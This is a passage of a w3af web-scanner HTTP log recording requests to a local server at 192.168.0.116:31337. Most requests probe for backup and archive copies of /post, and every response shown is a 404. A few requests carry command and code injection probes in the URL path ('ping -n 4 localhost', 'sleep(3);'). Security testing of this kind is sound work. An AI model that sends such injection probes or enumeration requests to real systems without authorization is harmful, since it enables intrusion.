                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="338">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="339">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="340">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="341">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="341">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="344">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="345">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/kAOzvCd9 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="347">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="353">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="355">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="356">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="358">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="359">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="360">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="361">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="362">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="363">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="364">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="366">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="367">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="367">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="369">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="369">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="371">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
